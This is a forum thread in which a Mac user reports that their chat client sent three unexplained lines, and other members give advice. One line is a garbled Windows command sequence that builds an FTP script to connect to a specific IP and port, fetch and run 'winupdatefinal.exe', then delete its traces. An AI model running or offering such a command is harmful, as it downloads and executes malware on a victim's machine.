Results 1 to 3 of 3
Discuss [PANIC] Possible Security Breach at the OSX Security - Hackint0sh.org; ...
  1. #1
    Newbie Array

    Join Date
    Dec 2007
    Posts
    2
    Post Thanks / Like
    Downloads
    0
    Uploads
    0
    Rep Power
    0

    Default [PANIC] Possible Security Breach

    so earlier this morning I was watching tv while my macbook pro was up and running in my bedroom. When I got back to it a classmate was messaging me through Adium, and for my surprise I WAS AUTOMATICALLY ANSWERING him. Well, not quite answering but there were 3 lines "I wrote" to him, they were as follows:

    %systemroot%system32cmd.exe

    del eq/echo open 201.75.69.44 6992 :: eq/echo user 9894 4767 :: eq /echo get winupdatefinal.exe :: eq /echo quit :: eq /ftp 'n 'seq /winupdatefinal.exe /del eq

    j

    for your consideration, my active sharing services were:
    screen sharing
    file sharing
    web sharing
    ssh
    bluetooth sharing

    also I have noticed that since yesterday spotlight has gone insane indexing my hard drives, but I hardly think it's related to this "attack".

    question is: am I in danger?
    i'd appreciate some clues on what's going on with my mac.
    thanks in advance,



  2. #2
    Newbie Array

    Join Date
    Feb 2009
    Location
    Niagara Falls, Canada
    Posts
    2
    Post Thanks / Like
    Downloads
    0
    Uploads
    0
    Rep Power
    0

    Default

    I think it's safe to say that this is the result of someone gaining access to your system, either via screen sharing, or ichat. Are you on a wireless network? What's your encryption? If it's WPA2, great, but are you allowing guest access and is your password more than 10 characters?

    I would immediatley disconnect from whatever network you're on, turn airport OFF, and run disk utility from finder/applications/utilities/disk utility...choosing Macintosh HD from left column, then click repair disk.
    After that, i would delete all preferred networks, and change your network access information from either airport utility if you have an apple router, or from your router's software if it's 3rd party!

    This is not something i have ever seen happen as a result of the OS itself acting up. Sorry and good luck!

  3. #3
    Senior Professional Array JayBird's Avatar

    Join Date
    Oct 2008
    Posts
    373
    Post Thanks / Like
    Downloads
    0
    Uploads
    0
    Rep Power
    27

    Default

    sounds like a s/breach, have you checked the IP against WHOIS : Whois record for 201.75.69.44 - its an IP in Brazil. The port it is using is used by many P2P apps such as LIMEWIRE.

    When searching Google for the EXE you mentioned: it IS LINKED TO A VIRUS:

    winupdate.exe problem - Viruses, Spyware and other Nasties

    you can normally tell if a virus is present it will masquerade as a normal file.
    I Do Not Condone Piracy, If You Like It BUY IT! - It's Ok To Test But Not Steal - MacBook Pro Owner

    iPhone Owner 3G

 

 

Similar Threads

  1. Replies: 0
    Last Post: 06-16-2010, 05:30 PM
  2. Replies: 0
    Last Post: 06-15-2010, 11:30 PM
  3. MacRumors: FBI Investigating AT&T iPad 3G Security Breach
    By hackint0sh in forum Latest Headlines
    Replies: 0
    Last Post: 06-11-2010, 06:40 PM
  4. MacRumors: FBI Investigating AT&T iPad 3G Security Breach
    By hackint0sh in forum Latest Headlines
    Replies: 0
    Last Post: 06-11-2010, 04:00 PM
  5. MacNN: FBI investigates iPad security breach
    By hackint0sh in forum Latest Headlines
    Replies: 0
    Last Post: 06-11-2010, 02:20 AM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Powered by vBulletin®
Copyright © 2014 vBulletin Solutions, Inc. All rights reserved.
Search Engine Friendly URLs by vBSEO
(c) 2006-2012 Hackint0sh.org
All times are GMT +2. The time now is 02:30 PM.
twitter, follow us!